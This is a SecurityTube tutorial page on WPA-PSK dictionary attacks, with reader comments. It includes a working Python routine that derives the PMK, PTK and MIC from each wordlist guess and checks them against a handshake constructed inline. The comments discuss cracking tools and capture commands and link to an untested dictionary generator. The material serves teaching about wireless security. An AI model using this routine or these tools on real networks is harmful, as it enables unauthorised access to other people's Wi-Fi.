Description: Welcome to Part 22 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we will look at how to crack WPA-PSK using a dictionary attack. An attacker can quietly observe the 4-way handshake and save these packets. He now has access to the SNonce, ANonce, Supplicant MAC and Authenticator MAC. Along with this he also has access to the MIC, which was computed using the PTK.
The only unknown is the passphrase, which can be anywhere between 8 and 63 characters. This is where the dictionary attack comes in! We will use a wordlist with which we will try to guess the passphrase. For each candidate we calculate the PMK from the guessed passphrase, then calculate the PTK with the help of the other data from the handshake, and finally verify the MIC in the handshake. If it matches, we have a winner! Otherwise, we try the next phrase.
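The derivation chain the description walks through (passphrase -> PMK via PBKDF2 -> PTK/KCK via the 802.11i PRF -> Key MIC over the EAPOL-Key frame), written out as an added example that is not part of the video or of aircrack-ng. The handshake data (MACs, nonces, SSID, passphrase and the EAPOL-Key message 2 frame) is constructed inline rather than captured, and the MIC offset of 81 assumes the standard EAPOL-Key layout; the point it makes is that the 4096 PBKDF2 iterations are the only per-guess cost, so passphrase entropy is the whole defence.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # Key MIC field offset inside an EAPOL-Key frame (802.1X header + key descriptor)

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). This is the per-guess cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... and truncate."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range((nbytes + 19) // 20))
    return b"".join(blocks)[:nbytes]

def kck_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces); the KCK is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]

def eapol_mic(kck, eapol, version=2):
    """Key MIC: HMAC over the EAPOL-Key frame with the MIC field zeroed (v1/TKIP = MD5, v2/CCMP = SHA1 truncated)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]

def passphrase_matches(passphrase, hs):
    """The check from the description: guessed passphrase -> PMK -> PTK/KCK -> recomputed MIC -> compare."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16])

def first_match(wordlist, hs):
    """Return the first wordlist entry whose recomputed MIC equals the captured one, else None."""
    return next((w for w in wordlist if passphrase_matches(w, hs)), None)

def constructed_handshake(passphrase="correct horse", ssid="ExampleNet"):
    """Constructed (not captured) handshake: MACs, nonces and an EAPOL-Key message 2 MIC'd with the real passphrase."""
    aa, spa = bytes.fromhex("00112233aabb"), bytes.fromhex("ccddeeff0011")
    anonce, snonce = bytes([0xA1]) * 32, bytes([0x5E]) * 32
    # descriptor type 2, Key Info 0x010A (v2, pairwise, MIC), key length 0, replay counter 1, then IV/RSC/ID/MIC zeroed
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1) + snonce + b"\x00" * 48 + struct.pack(">H", 0)
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X version 1, packet type 3 = EAPOL-Key
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": eapol}

if __name__ == "__main__":
    hs = constructed_handshake()
    print(first_match(["password", "12345678", "correct horse"], hs))  # correct horse
```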
Look forward to your comments!
Tags: wpa-psk, wireless, wifi, security, megaprimer, pbkdf, ptk, pmk, anonce, snonce
Excellent video Vivek! Finally WPA! The holy grail of WiFi hacking :)
Great work as always Dear Vivek, many thanks
Magic! Very clear explanation and demonstration. Thank you so much for your time Vivek. A good cup of ginger tea has got you firing on all cylinders again :-)
These have got to be the best tutorials on the web! As far as BT5 goes I agree with you. I am one of those people having a great deal of trouble getting everything working properly. Sometimes it works, most of the time it doesn't. It is baffling! For now, as a student, I am sticking with BT4R2.
First off, thanks a million for all the videos you have posted. To my great luck I found this site, especially since my college advanced project is based on finding methods of cracking wireless access points and then trying to secure them. I was having a hard time understanding the encryption methods of WEP, but then you posted the tutorial, and now I'm one step closer to completing my project. Thanks, and waiting for the next video......
Clear and concise Vivek, as usual! I know that it's possible to crack WPA-PSK without having captured all four packets of the handshake but, as you demonstrated in the last video, it's not guaranteed that all four are captured. I did some reading around this and some suggested using tcpdump. I also saw a comment about whether the fact that you're using BT4 in a VM might affect the capture of all four packets.
I realise it's academic but it's good to be able to capture all four in order to step through them in Wireshark and analyse exactly what fields are where and how their values change. I had a bit of a hard time getting my hands on the exact document that you used in your previous presentation listing the contents of the handshake packets, until I saw a file open (802.11i-2004.pdf) at page 87 on your desktop. Then it was easy!
Finally, you made me chuckle in the final few minutes. You always ask for comments and suggestions. I was going to ask about an explanation about TKIP and CCMP. I realise that the former is related to RC4 and the latter related to AES and details are not mandatory for what you're demonstrating. It was almost as if you read my mind when I was contemplating asking about them!
Keep up the good work. Your enthusiasm is infectious!
Another great Video Vivek
I wanted to know, will it be possible to crack the WPA packet by brute-forcing it? I have seen such a video somewhere, which used coWPAtty and an NVidia graphics card.
Just curious.....
Thanks again, especially for taking time for students like me.
Vivek:
I have been passively running airodump-ng/WICD at several locations and it amazes me how many people are still using WEP. I reside in the St. Louis, MO area. I see 25-40% of APs using WEP.
"Like drunk dialing is a crime" "WEP kills" <grin>
I have a thought for a future "MegaPrimer"! How about a sequel to the Assembly MegaPrimer with a basic intro to IDA Pro Free? Or even IPv6, i.e. the Next Header!
Brute force dictionary creator
http://www.governmentsecurity.org/forum/index.php?s=31995aa88d150024766714748c124d5b&app=core&module=attach&section=attach&attach_id=1843
un-tested
Thanks a lot Vivek for another excellent video.
Thanks Vivek, keep those videos coming!
Very good stuff!
Thanks Vivek, yet another excellent video. no_covers: Even an extremely fast system can only achieve about 100k keys/sec, which makes brute forcing a WPA key pretty pointless for full character set passwords with lengths above five characters. On the other hand there are some excellent tools you can use with a dictionary and GPU to speed things up, like Pyrit. One option is to do a pass-through mode through coWPAtty. The great thing about this is that you can run it with your dictionary file and not mess around with making a rainbow table. Another great tool is ocl, where you can append a rule to the dictionary. :)
Dear Mr. Vivek,
You are the best teacher I have come across.
Your teaching is so simple and up to date that even a beginner can follow.
I am truly speechless.
I know this is a suggestion page, but please help me!
I am using BackTrack 4 on my MacBook Pro running Oracle VirtualBox, the same one running in your videos; however, when I switch to full screen mode the default resolution of 800*600 stays, thus making the screen very small.
I'm really sorry to post this question, but please help me, as I have searched a lot but have not found an answer.
Awaiting your speedy reply,
Thanks :)
You will need to add the virtual box guest additions in order to take full advantage of the features. Check the vbox documentation.
@utkarsh_shah http://www.backtrack-linux.org/forums/beginners-forum/35185-backtrack-4r2-virtualbox-guest-additions.html
wicked. thanks again bro !
Just a couple of quick points. You can use John the Ripper to pipe all possibilities into aircrack (starting at 8 characters long, of course). It might take forever but it will find it. Two, remembering a really long passphrase isn't really that difficult. Almost everyone has a favorite song that they know the lyrics to, or they can use a piece of literature.
Consider this password:
"4score&7yearsAgo0urFathersBroughtForth0nThisContinentANewNation".
66 characters and still easy to remember.
i7-Cud4 How long do you estimate it would take to brute 8 - 20 chars?
So you are saying all of the U238 would be Pb(II) oxide before you found the phrase!
http://www.garykessler.net/library/password.html
That's at 1 million keys/second.
With WPA you get from 800 keys/s to 100k max.
This news is a little old but with the exponential increase in processing speed, GPU speed and SSD, how long do you think it will be before passwords become obsolete altogether?
https://www.infosecisland.com/blogview/9023-Cracking-14-Character-Complex-Passwords-in-5-Seconds.html
You asked in the video about BackTrack 5 and the Alfa card. Well, mine works perfectly. PS. You're a great teacher.
WCNA -- it would be nice to verify "...9023-Cracking-14-Character-Complex-Passwords-in-5-Seconds.html", e.g. by a third party...
@m0ei thanks a ton really appreciate the help :)
@WCNA - good points about JTR and GPU/SSD. Maybe we can persuade Vivek to do something about brute forcing? I guess that as WPA becomes used more widely, either larger dictionaries will be required or increasingly efficient methods of brute forcing.
My wireless at home has WPA with a >20 character passphrase including UC/LC/SC and numbers so I figure the chances of someone getting the passphrase are very low ... unless his name happens to be Vivek!
@no_covers said "it would be nice to verify"
Objectif Sécurité has a demo on their page as a proof of concept you can try. I grabbed a NTLM hash for a simple word 'HELLO' and it cracked it in a few seconds. Try it out and let us know what you find (read their limitations...after all they're trying to sell a product).
@John-Nash, Globalization, Chard, m0ei, MamboYoyo, utkarsh_shah, allisonmagicelite, no_covers, Wavelength Thanks Guys! :) Great to see so many people still hanging around :)
@Blackmarketeer I miss my Ginger tea, need to make a trip to the supermarket
@william I can't have that uncertainty :)
@silentkiller Good to know the videos are helping out! Any encryption or signature based validation scheme can be bruteforced. It's just a question of how much time it will take to do it.
@Ignatius The 4-way handshake is a pain, only yesterday I was cracking a network (legally :) ) and I found all 4 pkts, I almost cried :) Yes, AES, TKIP everything will be covered for sure :)
@no_covers Same here and my prediction is that till the time the AP ships with WEP, WEP will remain alive! It will never go away.
@i7-Cud4 Your nick indicates you are a GPU kinda guy :)
@utkarsh_shah I guess @m0ei answered your query
@WCNA, Ignatius I agree with you totally. Though I still feel we are years before everyone will use such passphrases. I could write some code to create a bruteforcing engine, will work on it once I am back to India next month from Belgium
Thanks for all the support guys :)
Next video has been posted: http://www.securitytube.net/video/1911
Yes sir, Mr. m0ei answered my query.
Thanks @m0ei.
Sir, I would like to tell you only one thing!
Never stop making your videos, as whatever knowledge I have gained is from you.
Take care and have a great stay in Belgium.
Thanks WCNA, I will check that out as soon as time permits!!
Sir, you are an awesome teacher.. :D
Hello everybody,
I am trying to crack the password from a pcap file that has been created for a "capture the flag" competition. But aircrack-ng couldn't find any from the password list which is in BT5. Please note that the pcap file does not contain all keys for the 3-way handshake, only two of them.
I generated a hash file with the genpmk utility and tried with coWPAtty. But this time it gives me the following error.
======================
cowpatty 4.6 - WPA-PSK dictionary attack.
End of pcap capture file, incomplete four-way handshake exchange. Try using a different capture.
======================
Do you have any suggestions about what to do next ?
PS: I have no doubt Vivek will point me into the right direction. :-)
Thanks,
Orhan
Vivek, I definitely enjoy watching your videos. I'm new to this and you teach it in a way where someone like myself can understand it. I don't mind listening when you teach the theory, because it's easy to digest and informative at the same time. Just keep doing what you're doing. I'm following you.. thank you..
Tony_Stark
Hello Vivek, after running airodump-ng --bssid <> --channel 1 --write <filename>
beacons are coming but not the data. What could be the problem? The beacon count is 14000 but no data. I am not sure what I am missing.
I request you all to reply on this and suggest the best command so that I can get through with the data and can then initiate a WPA handshake.
Great !
Thank you, my master.